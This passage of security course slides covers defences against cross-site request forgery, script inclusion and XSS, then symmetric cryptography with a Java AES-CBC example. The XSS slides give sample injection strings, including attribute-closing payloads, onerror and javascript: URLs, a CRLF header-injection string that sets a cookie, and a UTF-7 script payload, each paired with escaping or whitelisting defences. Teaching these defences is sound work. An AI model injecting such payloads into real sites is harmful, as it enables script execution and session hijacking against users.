Put an additional query parameter w/ token which must be consistent w/ session cookie Malicious page can’t guess token, request refused Employ same action token scheme introduced against XSRF in 10.3.3 (can use a single token for both purposes) Use POST whenever possible, to prevent leaking of token via GET parameters in URL Leakage risk less b/c JavaScript document, not HTML

285 10.4.2. Restriction to POST Requests
Cross-domain attacks entry point: <script> tags these always use GET To protect read-only requests, restrict to POST Use action tokens to protect all Ajax requests Ajax mixes read-only and state-changing (write) requests, so POST restriction alone doesn’t help

286 10.4.3. Preventing Resource Access for Cost Reasons
If ISP charges for volume of traffic Limit resource inclusion by 3rd party for cost reasons Just decline requests if Referer header is not one of our sites Serve requests with empty Referer headers Not a complete solution, but sufficient for limiting “bandwidth leeching” Perhaps a few requests slip through, but only a fraction of the cost still remains

287 10.5. Preventing XSS Never send untrusted data to browser
Such that data could cause execution of script Usually can just suppress certain characters We show examples of various contexts in HTML document as template snippets Variable substitution placeholders: %(var)s evil-script; will denote what attacker injects Contexts where XSS attack is possible

288 10.5.1. General Considerations
Input Validation vs. Output Sanitization XSS is not just an input validation problem Strings with HTML metachars not a problem until they’re displayed on the webpage Might be valid elsewhere, e.g. in a database, and thus not validated later when output to HTML Sanitize: check strings as you insert into HTML doc HTML Escaping: escape some chars with their HTML entities, e.g. & becomes &amp; < becomes &lt; > becomes &gt; " becomes &quot; Library functions exist, but check docs (may not escape all characters)!
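A minimal HTML-escaper covering the characters listed above (a sketch; production code should prefer a vetted library function):

static String htmlEscape(String s) {
    StringBuilder out = new StringBuilder(s.length());
    for (int i = 0; i < s.length(); i++) {
        char c = s.charAt(i);
        switch (c) {
            case '&':  out.append("&amp;");  break;
            case '<':  out.append("&lt;");   break;
            case '>':  out.append("&gt;");   break;
            case '"':  out.append("&quot;"); break;
            case '\'': out.append("&#39;");  break;   // for single-quoted attributes
            default:   out.append(c);
        }
    }
    return out.toString();
}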

289 10.5.2. Simple Text Most straightforward, common situation
Example Context: Attacker sets query = <script>evil-script;</script> HTML snippet renders as Prevention: HTML-escape untrusted data Rationale: If not escaped <script> tags evaluated, data may not display as intended <b>Error: Your query '%(query)s' did not return any results.</b> <b>Error: Your query '<script>evil-script;</script>' did not return any results.</b>

290 10.5.3. Tag Attributes (e.g., Form Field Value Attributes)
Contexts where data is inserted into tag attribute Example HTML Fragment: Attacker sets Renders as Attacker able to “close the quote”, insert script <form ...><input name="query" value="%(query)s"></form> query = cookies"><script>evil-script;</script> <form ...> <input name="query" value="cookies"> <script>evil-script;</script>"> </form>

291 10.5.3. More Attribute Injection Attacks
Image Tag: <img src=%(image_url)s> Attacker sets image_url = onerror=evil-script; After Substitution: <img src= onerror=evil-script;> Lenient browser: first whitespace ends src attribute onerror attribute sets handler to be desired script Attacker forces error by supplying URL w/o an image Can similarly use onload, onmouseover to run scripts Attack string didn’t use any HTML metacharacters!

292 10.5.3. Preventing Attribute Injection Attacks
HTML-escape untrusted data as usual Escape &, ', ", <, > Also attribute values must be enclosed in " " Must escape the quote character to prevent “closing the quote” attacks as in example Decide on convention: single vs. double quotes But escape both anyway to be safe

293 10.5.4. URL Attributes (href and src)
Dynamic URL attributes vulnerable to injection Script/Style Sheet URLs: <script src="%(script_url)s"> Attacker sets script_url to a URL on a server under his control javascript: URLs - <img src="%(img_url)s"> By setting img_url = javascript:evil-script; we get <img src="javascript:evil-script;"> And browser executes script when loading image

294 10.5.4. Preventing URL Attribute Injection
Escape attribute values and enclose in " " Follow guidelines for general injection attacks Only serve data from servers you control For URLs to 3rd party sites, use absolute HTTP URLs (i.e. starting with http:// or https://) Against javascript: injection, whitelist for good URLs (apply positive filter) Not enough to just blacklist, too many bad URLs Ex: even escaping colon doesn’t prevent script Could also be data:text/html,<script>evil-script;</script>

295 Style Attributes Dangerous if attacker controls style attributes Attacker injects: Browser evaluates: In IE 6 (but not Firefox 1.5), script is executed! Prevention: whitelist through regular expressions Ex: ^([a-z]+)|(#[0-9a-f]+)$ specifies safe superset of possible color names or hex designation Or expose an external param (e.g. color_id) mapped to a CSS color specifier (lookup table) <div style="background: %(color)s;">I like colors.</div> color = green; background-image: url(javascript:evil-script;) <div style="background: green; background-image: url(javascript:evil-script;);"> I like colors. </div>

296 Within Style Tags Injections into style= attributes also apply for <style> tags Validate data by whitelisting before inserting into HTML document <style> tag Apply same prevention techniques as for style attributes (previous slide)

297 10.5.7. In JavaScript Context Be careful embedding dynamic content
<script> tags or handlers (onclick, onload, …) In Ajax-apps, server commonly returns JavaScript: Attacker injects: And evil-script; is executed! <script> var msg_text = 'oops'; evil-script; //'; // do something with msg_text </script> <script> var msg_text = '%(msg_text)s'; // do something with msg_text </script> msg_text = oops'; evil-script; //

298 10.5.7. Preventing JavaScript Injection
Don’t insert user-controlled strings into JavaScript contexts <script> tags, handler attributes (e.g. onclick) w/in code sourced in <script> tag or using eval() Exceptions: data used to form literal (strings, ints, …) Enclose strings in ' ' & backslash escape (\n, \t, \x27) Format non-strings so that string rep is not malicious Backslash escaping important to prevent “escape from the quote” attack where notions of “inside” and “outside” string literals is reversed Numeric literals ok if from Integer.toString(), …
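A sketch of such an escaper for the JavaScript string-literal context; the choice to hex-escape the HTML metacharacters as well follows the guidance above (names and exact escape set are illustrative):

static String jsStringEscape(String s) {
    StringBuilder out = new StringBuilder(s.length());
    for (int i = 0; i < s.length(); i++) {
        char c = s.charAt(i);
        switch (c) {
            case '\\': out.append("\\\\");  break;    // escape the escape char itself
            case '\'': out.append("\\x27"); break;    // quotes as hex escapes
            case '"':  out.append("\\x22"); break;
            case '\n': out.append("\\n");   break;
            case '\r': out.append("\\r");   break;
            case '<': case '>': case '&':             // HTML metachars, hex-escaped too
                out.append(String.format("\\x%02x", (int) c)); break;
            default:   out.append(c);
        }
    }
    return out.toString();
}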

299 10.5.7. Another JavaScript Injection Example
From previous example, if attacker sets the following HTML is evaluated: Browser parses document as HTML first Divides into 3 <script> tokens before interpreting as JavaScript Thus 1st & 3rd invalid, 2nd executes as evil-script msg_text = foo</script><script>evil-script;</script><script> <script>var msg_text = 'foo</script> <script>evil-script;</script> <script>'// do something with msg_text</script>

300 10.5.8. JavaScript-Valued Attributes
Handlers inside onload, onclick attributes: HTML-unescaped before passing to JS interpreter Ex: Attacker injects: Browser Loads: JavaScript Interpreter gets Prevention: Two Rounds of Escaping JavaScript escape input string, enclose in ' ' HTML escape entire attribute, enclose in " " <input ... onclick='GotoUrl("%(targetUrl)s");'> targetUrl = foo");evil_script(" <input ... onclick='GotoUrl("foo");evil_script("");'> GotoUrl("foo");evil_script("");

301 10.5.8. JavaScript-Valued Attributes Prevention Rationale
HTML-escaping step prevents attacker from sneaking in HTML-encoded characters Different style quotes Single for JavaScript literals Double for HTML attributes Avoid one type accidentally “ending” the other JavaScript escape function should escape HTML metachars (&, <, >, ", ') as well Escaped into hex or unicode Additional security measure if second step forgotten

302 10.5.9. Redirects, Cookies, and Header Injection
Need to filter and validate user input inserted into HTTP response headers Ex: servlet returns HTTP redirect
HTTP/1.1 302 Moved Content-Type: text/html; charset=ISO-8859-1 Location: %(redir_url)s <html> <head><title>Moved</title></head> <body>Moved <a href='%(redir_url)s'>here</a></body> </html>
Attacker Injects: (URI-encodes newlines)
oops:foo\r\nSet-Cookie: SESSION=13af..3b; domain=mywwwservice.com\r\n\r\n <script>evil()</script>

303 10.5.9. Header Injection Example
Resulting HTTP response:
HTTP/1.1 302 Moved Content-Type: text/html; charset=ISO-8859-1 Location: oops:foo Set-Cookie: SESSION=13af..3b; domain=mywwwservice.com
<script>evil()</script><html><head><title>Moved</title> </head><body> Moved <a href='oops:foo <script>evil()</script>'>here</a></body></html>
Attacker sets desired cookies: could overwrite user preferences (DoS) or action tokens (XSRF) Double CRLF injects script into body which could be executed after Location: header is invalidated

304 10.5.9. Preventing Header Injection
Ensure URLs for Location: headers are well-formed http: or https: Only consists of characters permitted to be non-escaped according to standard (e.g. RFC 2396) Checks that it’s not javascript: URL for example Check that cookie names and values within standard (e.g. RFC 2965) Setting other headers: ensure values contain only characters allowed by HTTP/1.1 protocol spec (RFC 2616) Restricting to specs ensures browser parses correctly
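One way to implement the URL check, sketched with java.net.URI (the allowed-scheme policy is an assumption; adapt it to the app). The URI constructor also rejects raw CR/LF outright, which blocks header splitting:

import java.net.URI;

static boolean safeRedirectUrl(String url) {
    try {
        URI u = new URI(url);                          // throws on CR/LF and other junk
        String scheme = u.getScheme();
        return ("http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme))
                && u.getHost() != null;                // excludes javascript:, data:, ...
    } catch (Exception e) {
        return false;                                  // malformed: refuse to redirect
    }
}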

305 10.5.10. Filters for “Safe” Subsets of HTML
Allow “safe” subset of HTML and render to user Ex: web-based app Can allow “harmless” HTML tags (e.g. <h1>) But don’t allow execution of malicious scripts Use strict HTML parser Strip tags and attributes that are not whitelisted (i.e. known to not allow arbitrary scripting) Consult a security expert

306 10.5.11. Unspecified Charsets, Browser-Side Charset Guessing, and UTF-7 XSS Attacks
Browser needs to know what character encoding to use to render HTML document Server can specify through charset parameter of Content-Type HTTP header or <meta http-equiv> Default: ISO-8859-1 Or may try to guess the charset Example: attacker injects UTF-7 text No characters that are normally filtered No charset specified, so IE guesses UTF-7 +ADw- , +AD4- encode < , >: script executed! +ADw-script+AD4-alert(document.domain);+ADw-/script+AD4-

307 10.5.11. Preventing Charset XSS Attacks
Explicitly specify appropriate charset Ex: Content-Type: text/html; charset=UTF-8 Or through tag: Meta-tag should appear before untrusted tags Appropriate: the one that reflects encoding assumptions used by app for filtering/sanitizing input and HTML encoding output strings <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

308 10.5.12. Non-HTML Documents & IE Content-Type Sniffing
Browsers may ignore MIME type of document Specifying Content-Type: text/plain should not interpret HTML tags when rendering But not true for IE: mime-type detection AKA Content-Type Sniffing: ignores MIME spec IE scans doc for HTML tags and interprets them Even reinterprets image documents as HTML!

309 10.5.12. Preventing Content-Type Sniffing XSS Attacks
Validate that content format matches MIME type Especially for image files: process through library Read image file, convert to bitmap, convert back Don’t trust image file format; ensure no HTML tags in first 256 bytes of non-HTML file Could prepend 256 bytes of whitespace Empirically determined # (also in docs), could be different for other versions Or could HTML-escape entire document

310 10.5.13. Mitigating the Impact of XSS Attacks
HTTP-Only Cookies: incomplete protection HTTPOnly attribute on cookie in IE prevents it from being exposed to client-side scripts can prevent traditional session hijacking But only for IE and doesn’t prevent direct attacks Should also disable TRACE requests Binding Session Cookies to IP Address check if session token is being used from multiple IP addresses (especially geographically distant) could cause user inconvenience, use only for high-value transactions

311 Types of XSS Attacks Recap
Context / Example (where to inject evil-script) / Prevention Technique
Simple Text / <b>'%(query)'</b> / HTML Escaping
Tag Attributes (Attribute-Injection) / <input … value="%(query)"/> / HTML Escaping (attrib values in " ")
URL Attributes (href, src attribs.) / <script src="%(script_url)"> / Whitelist (src from own server?)
Style Attributes (or <style> tags) / <div style="background: %(color);"> / Whitelist (Use RegExps)
JavaScript (JS) / <input... onclick=''> / Escape JS/HTML
HTTP Header / HTTP/1.1 302 Moved... Location: %(redirUrl) / Filter Bad URLs (check format)

312 Summary Cross-Domain Attacks Prevention:
Not direct attacks launched against our app User views ours and a malicious site in same browser Attacker tries to run evil scripts, steal our cookies, … Types: XSRF, XSSI, XSS Prevention: Against XSRF & XSSI: use cookie-based authentication, prefer POST over GET, action tokens Against XSS: validate input & sanitize output, use HTML/Javascript escaping appropriately, whitelist

313 CHAPTER 11 Exercises for Part 2

314 Conceptual Exercises (1)
In Chapter 9, the password manager stored passwords in a file. What would be some of the trade-offs involved in storing the passwords in a relational database instead of in a file? What types of additional input validation might need to be done on usernames and passwords if they are to be stored in a database?

315 Conceptual Exercises (2)
Write an HTML filter that, given an arbitrary HTML document, produces an HTML document that will not result in the execution of script if loaded into a user’s browser, but leaves “basic markup” (fonts, formatting, etc.) intact. Consider the possibility that the input document is not well-formed HTML, and also consider browser-specific features.

316 Programming Problem Implement HTTP digest authorization. Use a password file with salts, and reuse the BasicAuthWebServer from Chapter 9. Implement a program that allows you to add and delete passwords to and from the password file.

317 CHAPTER 12 Symmetric Key Cryptography

318 Agenda Cryptography (crypto)– study of how to mathematically encode & decode messages Cryptographic primitive (low-level) = algorithm Applied Cryptography – how to use crypto to achieve security goals (e.g. confidentiality) Primitives build up higher-level protocols (e.g. digital signature – only constructible by signer) Symmetric Encryption: Alice, Bob use same key

319 12.1. Introduction to Cryptography
Goal: Confidentiality. Message “sent in the clear”: Eve can overhear. Encryption makes the message unintelligible to Eve; only Bob can decipher it with his secret key (shared w/ Alice). (Diagram: Alice sends Bob “My account number is … and my PIN is 4984” while Eve listens.)

320 12.1.1. Substitution Ciphers Plaintext: meet me at central park
Ciphertext: phhw ph dw fhqwudo sdun
Plain:  abcdefghijklmnopqrstuvwxyz
Cipher: defghijklmnopqrstuvwxyzabc
Key is 3, i.e. shift each letter right by 3. Easy to break due to the known frequency of letters in the language. A good encryption algorithm produces output that looks random: equal probability that any bit is 0 or 1.
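The shift cipher is easy to express in code. A minimal Java sketch of our own (for illustration only) that reproduces the slide's example:

public class ShiftCipher {
    // Shift each lowercase letter right by 'shift' positions (mod 26);
    // all other characters pass through unchanged.
    static String encrypt(String plain, int shift) {
        StringBuilder sb = new StringBuilder();
        for (char c : plain.toCharArray()) {
            if (c >= 'a' && c <= 'z')
                sb.append((char) ('a' + (c - 'a' + shift) % 26));
            else
                sb.append(c);
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println(encrypt("meet me at central park", 3));
        // prints: phhw ph dw fhqwudo sdun
    }
}

Decryption is the same routine run with shift 26 - 3 = 23.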

321 12.1.2. Notation & Terminology
m = message (plaintext), c = ciphertext
F = encryption function, F^-1 = decryption function
k = key (secret number)
c = F(m,k) = F_k(m) = encrypted message
m = F^-1(c,k) = F^-1_k(c) = decrypted message
Symmetric cipher: F^-1(F(m,k), k) = m, same key for both directions

322 Symmetric Encryption Alice encrypts a message with the same key that Bob uses to decrypt. Eve can see c, but cannot compute m because k is known only to Alice and Bob.
Alice: 1. Construct m. 2. Compute c = F(m,k). 3. Send c to Bob.
Bob: 4. Receive c from Alice. 5. Compute d = F^-1(c,k). 6. m = d.

323 12.1.3. Block Ciphers Blocks of bits (e.g. 256) encrypted at a time
Examples of several algorithms: Data Encryption Standard (DES), Triple DES, Advanced Encryption Standard (AES, a.k.a. Rijndael), International Data Encryption Algorithm (IDEA), Blowfish, Skipjack, and many more… (c.f. Schneier)

324 DES Adopted in 1977 by NIST (then the National Bureau of Standards). Input: 64-bit plaintext, 56-bit key (64 w/ parity). Parity Bits: redundancy to detect corrupted keys. Output: 64-bit ciphertext. Susceptible to brute force (try all 2^56 keys). 1998: the machine Deep Crack broke it in 56 hours; it has subsequently been broken even faster. Key size should be at least 128 bits to be safe. XOR = Exclusive OR. FIPS = Federal Information Processing Standard. Key size was originally 128 bits; the NSA reduced it to 56 bits. The key is actually 64 bits, with 8 parity bits; we say the key is 56 bits because it only has 56 bits of entropy. Designed for speed and hardware implementation. Feistel was one of the people at IBM who helped design the algorithm. IP and its inverse don't provide any additional security, but they simplify the hardware implementation of DES. High-level description of the algorithm: the input bits are permuted, then split into a left half and a right half. During each round, the 32 bits of the right half are expanded to 48 bits (some bits are used more than once) and XORed with 48 bits selected from the key. The XORed bits are then run through 8 “S-boxes,” or substitutions, where each S-box takes 6 bits as input and produces 4 bits of output. The S-boxes give DES its security. The result of the S-box computation is then permuted once more (using a P-box) and XORed with the left half of the bits. The left and right halves are then switched for the next round. 16 rounds are repeated, and then a final permutation is applied. Goal: every bit of the ciphertext should be a random function of the plaintext and the key, such that given many plaintext/ciphertext pairs, it is computationally infeasible to deduce the key. The same algorithm is used for encryption and decryption; for decryption, the round keys are used in reverse order. Sounds like black magic. There was much speculation that the NSA put a “back door” into the algorithm. Exportable only if <= 40 bits are used for the key. Is 16 rounds enough? The algorithm has been broken with smaller numbers of rounds; use 3-DES for more rounds.

325 12.1.3. Triple DES Do DES thrice w/ 3 different keys (slower)
c = F(F^-1(F(m,k1),k2),k3) where F = DES. Why decrypt with k2? Backwards compatible w/ DES, easy upgrade. Keying Options (Key Size w/ Parity): k1 ≠ k2 ≠ k3 : 168-bit (192-bit); k1 = k3 ≠ k2 : 112-bit (128-bit); k1 = k2 = k3 : 56-bit (64-bit) (equivalent to DES). Triple DES can be used to achieve a higher level of security than DES alone. As the name implies, Triple DES runs DES three times with three potentially different keys. The way you would do a Triple DES encryption is by taking the input message, M, encrypting it with key 1, decrypting the resulting message with key 2, and encrypting that message with key 3. You might be wondering why Triple DES does a decryption as its second step instead of just encrypting three times. The reason is backward compatibility. Notice that if k1 = k2 = k3 (all the keys are the same), doing a Triple DES encryption is exactly equivalent to doing a DES encryption. This means that if your system used to, say, use a microchip that had DES implemented in hardware, you could switch to a microchip that uses Triple DES quite easily by giving the Triple DES chip the same key for all three required keys. Of course, once you do switch over to Triple DES, you can achieve a higher level of security by using more than just one key. To get the higher level of security, you can choose three different keys, which will give you 168 bits of security (the entire key will be 192 bits including the parity bits). Alternatively, you can use only two different keys, setting k1 = k3, which will give you 112 bits of security (the key will be 128 bits with the parity bits). You may have heard that web browsers do “128-bit encryption” when communicating with web servers that use SSL, the secure sockets layer protocol. This “128-bit encryption” is done with Triple DES using two keys, so now you know a little bit about the type of encryption that web browsers use. We will learn more about SSL in Lecture 5. Finally, as mentioned earlier, if you use the same key for all three Triple DES keys, Triple DES is equivalent to DES, with the caveat that it could be up to three times slower, since two encryptions and one decryption need to be done to emulate DES. Also part of FIPS 46-3. 128-bit 3DES used in web browsers that support SSL. Much more secure than DES. Why decrypt using the second key instead of encrypt? For backward compatibility.

326 12.1.3. AES (Rijndael) Invented by 2 Belgian cryptographers
Selected by NIST from 15 competitors after three years of conferences vetting proposals. Selection Criteria: security; cost (speed/memory); implementation considerations (hardware/software). Key size & block size: 128, 192, or 256 bits (much larger than DES). Rely on algorithmic properties for security, not obscurity. The next symmetric cipher that we will cover is AES, the Advanced Encryption Standard, adopted by NIST in October 2000 as a replacement for DES. DES is too easily crackable, and Triple DES is too slow (requiring 48 rounds of a Feistel network); AES is meant to be a replacement for DES / Triple DES that provides security with larger keys and fewer rounds. The AES standard is a government-endorsed cipher that was developed using the most open process to date for such things. In 1997, the need for a new standard was announced by NIST, the National Institute of Standards and Technology, which invited proposals for a new symmetric block cipher that satisfied its requirements. Fifteen different ciphers were proposed by cryptographers from all over the world, and conferences were held over the course of a three-year period that debated the strengths and weaknesses of the proposed ciphers with regard to security, speed, memory requirements, and other hardware and software implementation considerations. The requirements for AES were more stringent than for DES because, for example, NIST wanted to select an algorithm that would work well on mobile devices that have slower processors and less memory than desktop computers. In August 1999, five finalists were chosen, and the proposal made by 2 Belgian cryptographers, called Rijndael, was chosen to be the AES standard. Rijndael supports key and block sizes of 128, 192, or 256 bits, and runs in 10, 12, or 14 rounds depending upon the key/block size. Interestingly enough, the Rijndael cipher uses S-boxes and XORs, but does not use a Feistel network. In applications that need symmetric block encryption, using AES will achieve better performance and use less memory than DES or Triple DES. Due to the nature of the selection process it went through, the hope is that AES is also more secure than DES.

327 12.1.4. Security by Obscurity: Recap
Design of the DES and Triple DES algorithms is public. Security is not dependent on secrecy of the implementation, but rather on secrecy of the key. Benefits of keys: easy to replace if compromised; increasing the size by one bit doubles the attacker's work. If you invent your own algorithm, make it public! Rely on algorithmic properties (math), not obscurity.

328 Electronic Code Book Encrypting more data: ECB encrypts each block of a large document independently. Leaks info about the structure of the document (e.g. repeated plaintext blocks). (Diagram: plaintext blocks P1, P2, …, Pn are each encrypted under K with DES to give C1, C2, …, Cn.) So far, we have covered three block ciphers, DES, Triple DES, and AES, that can be used to encrypt 64-, 128-, 192-, or 256-bit blocks of plaintext. They are called block ciphers because they take input blocks of 64, 128, etc. bits. However, we haven't really talked about how to encrypt larger amounts of data. Let's say, for example, that we have a one-megabyte document of plaintext that we would like to encrypt with a 64-bit key using DES. One megabyte is 2^17 64-bit blocks. We could take each of these 64-bit blocks of plaintext input and independently run each of them through DES to produce 2^17 64-bit blocks of ciphertext. This technique is called ECB, or Electronic Code Book, encryption. It is as if we are looking up each 64-bit plaintext block in a (very large) “electronic code book” to determine what the corresponding ciphertext should be. There is a problem with this form of encryption using block ciphers: it is likely that some of the 64-bit plaintext blocks are repeated many times in the one-megabyte document. For instance, if the document is simply text, and the word “security” appears in the document multiple times (aligned on 64-bit boundaries), then the exact same ciphertext will appear in the encrypted document multiple times as well. This leaks some information about the structure of the document to the attacker. We would ideally like the encrypted document to look like completely random garble to the attacker, such that the probability that any bit in the encrypted document is a 1 (or a 0) is ½. To achieve this, we should not use this “electronic code book” method of concatenating ciphertext blocks. Instead of having each block of ciphertext depend on only one block of plaintext, we would like each block of ciphertext to depend on all of the previous ciphertext, so that we can hide such patterns. Problem: someone can tell if Pi = Pj because Ci will equal Cj.
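The pattern leak is easy to observe with the standard Java crypto API. A small sketch of our own (not from the book) that encrypts two identical 16-byte blocks in ECB mode and shows that the resulting ciphertext blocks match:

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import java.util.Arrays;

public class EcbLeakDemo {
    public static void main(String[] args) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey key = kg.generateKey();

        Cipher ecb = Cipher.getInstance("AES/ECB/NoPadding");
        ecb.init(Cipher.ENCRYPT_MODE, key);

        byte[] block = "security is fun!".getBytes();  // exactly 16 bytes
        byte[] plaintext = new byte[32];               // same block twice
        System.arraycopy(block, 0, plaintext, 0, 16);
        System.arraycopy(block, 0, plaintext, 16, 16);

        byte[] ct = ecb.doFinal(plaintext);
        System.out.println(Arrays.equals(
            Arrays.copyOfRange(ct, 0, 16),
            Arrays.copyOfRange(ct, 16, 32)));          // true: structure leaks
    }
}

Run the same experiment in CBC mode with a random IV and it prints false.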

329 12.1.5. Review of XOR Exclusive OR (either x or y but not both)
Special Properties: if x XOR y = z, then z XOR y = x and x XOR z = y
Truth table:
x y | x XOR y
0 0 | 0
0 1 | 1
1 0 | 1
1 1 | 0

330 12.1.5. Cipher Block Chaining … CBC: uses XOR, no patterns leaked!
Each ciphertext block depends on the previous block. (Diagram: each plaintext block Pi is XORed with the previous ciphertext block, starting from the IV, and then encrypted with DES under K to give Ci.) CBC, or Cipher Block Chaining, accomplishes this. In CBC, we XOR the previous block of ciphertext with the current plaintext block, and then encrypt the result to produce a ciphertext block. By doing this, each ciphertext block is dependent on all previous ciphertext blocks as well as the current plaintext block, and patterns in the encrypted text are thereby hidden. Now, even if the word “security” appears in the plaintext multiple times aligned on 8-byte boundaries, the ciphertext for the word “security” will be different each time in the encrypted version of our file. Solution: make C[i+1] dependent upon C[1]…C[i]. Other block chaining methods exist: CFB (Cipher Feedback) and OFB (Output Feedback); we won't cover them here (see Schneier's book).

331 12.1.5. Output Feedback (OFB) … Makes block cipher into stream cipher
Like CBC, but the XOR with the plaintext is done after the encryption step: starting from the IV, the block cipher (e.g. AES under key K) repeatedly encrypts the chained value to produce a keystream, and each keystream block is XORed with P1…Pn to give C1…Cn, turning the block cipher into a stream cipher.

332 12.1.6. AES Code Example Example Java Class: AESEncrypter
Command-line utility: Create AES key Encrypt & Decrypt with key AES in CBC mode Arguments: <command> <keyfile> command = createkey|encrypt|decrypt Input/output from stdin and stdout

333 Using AESEncrypter Alice generates a key and encrypts a message. She gives Bob mykey over a secure channel, then can send ciphertext over an insecure channel. Bob can decrypt Alice's message with mykey:
$ java com.learnsecurity.AESEncrypter createkey mykey
$ echo "Meet Me At Central Park" | java com.learnsecurity.AESEncrypter encrypt mykey > ciphertext
$ java com.learnsecurity.AESEncrypter decrypt mykey < ciphertext
Meet Me At Central Park

334 12.1.6. AESEncrypter: Members & Constructor
/* Import Java Security & Crypto packages, I/O library */
import java.io.*;
import java.security.*;
import java.security.spec.AlgorithmParameterSpec;
import javax.crypto.*;
import javax.crypto.spec.*;

public class AESEncrypter {
    public static final int IV_SIZE = 16;       // 128 bits
    public static final int KEY_SIZE = 16;      // 128 bits
    public static final int BUFFER_SIZE = 1024; // 1 KB

    Cipher cipher;                  /* Does encryption and decryption */
    SecretKey secretKey;
    AlgorithmParameterSpec ivSpec;  /* Initialization Vector (IV) */
    byte[] buf = new byte[BUFFER_SIZE];
    byte[] ivBytes = new byte[IV_SIZE];  /* later used to init ivSpec */

    public AESEncrypter(SecretKey key) throws Exception {
        cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        /* Use AES in CBC mode, pad input to a 128-bit multiple */
        secretKey = key;
    }
    // ... Methods Follow ...

335 12.1.6. AESEncrypter: encrypt()
public void encrypt(InputStream in, OutputStream out) throws Exception {
    ivBytes = createRandBytes(IV_SIZE);  // create IV & write to output
    out.write(ivBytes);
    ivSpec = new IvParameterSpec(ivBytes);
    cipher.init(Cipher.ENCRYPT_MODE, secretKey, ivSpec);
    // cipher initialized to encrypt, given secret key, IV
    // Bytes written to cipherOut will be encrypted
    CipherOutputStream cipherOut = new CipherOutputStream(out, cipher);
    // Read in the plaintext bytes and write to cipherOut to encrypt
    int numRead = 0;
    while ((numRead = in.read(buf)) >= 0)  // read plaintext
        cipherOut.write(buf, 0, numRead);  // write ciphertext
    cipherOut.close();                     // padded to 128-bit multiple
}

336 12.1.6. AESEncrypter: decrypt()
public void decrypt(InputStream in, OutputStream out) throws Exception {
    in.read(ivBytes);  // read the IV first, from the passed-in stream
    ivSpec = new IvParameterSpec(ivBytes);
    cipher.init(Cipher.DECRYPT_MODE, secretKey, ivSpec);
    // cipher initialized to decrypt, given secret key, IV
    // Bytes read from in will be decrypted
    CipherInputStream cipherIn = new CipherInputStream(in, cipher);
    // Read the decrypted bytes and write the plaintext to out
    int numRead = 0;
    while ((numRead = cipherIn.read(buf)) >= 0)  // read ciphertext
        out.write(buf, 0, numRead);              // write plaintext
    out.close();
}

337 AESEncrypter: main()
public static void main(String[] args) throws Exception {
    if (args.length != 2) usage();        // improper usage, print error
    String operation = args[0];           // createkey|encrypt|decrypt
    String keyFile = args[1];             // name of key file
    if (operation.equals("createkey")) {
        FileOutputStream fos = new FileOutputStream(keyFile);
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(KEY_SIZE * 8);            // key size in bits
        SecretKey skey = kg.generateKey();
        fos.write(skey.getEncoded());     // write key
        fos.close();
    } else {
        byte[] keyBytes = new byte[KEY_SIZE];
        FileInputStream fis = new FileInputStream(keyFile);
        fis.read(keyBytes);               // read key
        fis.close();
        SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
        AESEncrypter aes = new AESEncrypter(keySpec); // init w/ key
        if (operation.equals("encrypt")) {
            aes.encrypt(System.in, System.out);       // Encrypt
        } else if (operation.equals("decrypt")) {
            aes.decrypt(System.in, System.out);       // Decrypt
        } else usage();                   // improper usage, print error
    }
}

338 12.1.6. AESEncrypter: Helpers
/* Generate numBytes of random bytes to use as an IV */
public static byte[] createRandBytes(int numBytes) throws NoSuchAlgorithmException {
    byte[] bytesBuffer = new byte[numBytes];
    SecureRandom sr = SecureRandom.getInstance("SHA1PRNG");
    sr.nextBytes(bytesBuffer);
    return bytesBuffer;
}

/* Display error message when AESEncrypter is improperly used */
public static void usage() {
    System.err.println("java com.learnsecurity.AESEncrypter " +
                       "createkey|encrypt|decrypt <keyfile>");
    System.exit(-1);
}
}  // closes class AESEncrypter

339 AESEncrypter Recap The Java class KeyGenerator can be used to construct strong, cryptographically random keys. AESEncrypter provides no integrity protection: the encrypted file could be modified. So in practice, should also append a MAC; use different keys for the MAC and the encryption. Key distribution is a challenge (c.f. Ch )
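One way to add the missing integrity protection is encrypt-then-MAC: compute an HMAC over the ciphertext (IV included) with a second, independent key, and verify it before decrypting. A hedged sketch with our own naming, not part of the book's AESEncrypter:

import javax.crypto.Mac;
import javax.crypto.SecretKey;
import java.security.MessageDigest;

public class EncryptThenMac {
    // Tag the ciphertext with HMAC-SHA256 under a *separate* integrity key.
    static byte[] tag(byte[] ciphertext, SecretKey macKey) throws Exception {
        Mac hmac = Mac.getInstance("HmacSHA256");
        hmac.init(macKey);
        return hmac.doFinal(ciphertext);
    }

    // Receiver recomputes the tag and compares in constant time
    // before passing the ciphertext to the decryption routine.
    static boolean verify(byte[] ciphertext, byte[] tag, SecretKey macKey)
            throws Exception {
        return MessageDigest.isEqual(tag(ciphertext, macKey), tag);
    }
}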

340 12.2. Stream Ciphers Much faster than block ciphers
Encrypts one byte of plaintext at a time. Keystream: infinite sequence (never reused) of random bits used as the key. Approximates a theoretical scheme, the one-time pad, trying to make it practical with finite keys. Until now, we have focused on block-based symmetric encryption schemes in which blocks of plaintext are encrypted at a time. There also exists another class of symmetric encryption schemes, called stream ciphers, in which one byte (or even one bit) of plaintext is encrypted at a time. Stream ciphers are, in general, much faster than block ciphers. They work by generating an infinite stream of key bits that are then simply XORed with the plaintext. When we first talked about XOR, we mentioned that it is not secure to simply XOR a key with some plaintext to encrypt it, because if an attacker got hold of some plaintext and its corresponding ciphertext, the attacker could simply XOR the two together to obtain the key. Hence, we can never use the same key bits twice, and in a stream cipher this is exactly what we ensure: the keystream is an effectively infinite sequence of random bits that is never reused. The goal of a good stream cipher is to generate such a keystream. In doing so, stream ciphers attempt to practically approximate a theoretical encryption scheme called a one-time pad. A one-time pad is a cipher in which plaintext is XORed with a truly random stream of bits of the same length as the plaintext. (This is the reason a one-time pad is impractical: carrying around a key that is the same size as the plaintext is unworkable.) Also, note that a one-time pad is called a one-time pad because the key must be used exactly once. Why would we want to approximate such an impractical theoretical encryption scheme? Claude Shannon proved that one-time pads offer a property called “perfect secrecy.” Perfect secrecy means that under a brute-force attack, every possible decryption is equally likely. Consider the following: let's say that an attacker got hold of some ciphertext that was encrypted using a one-time 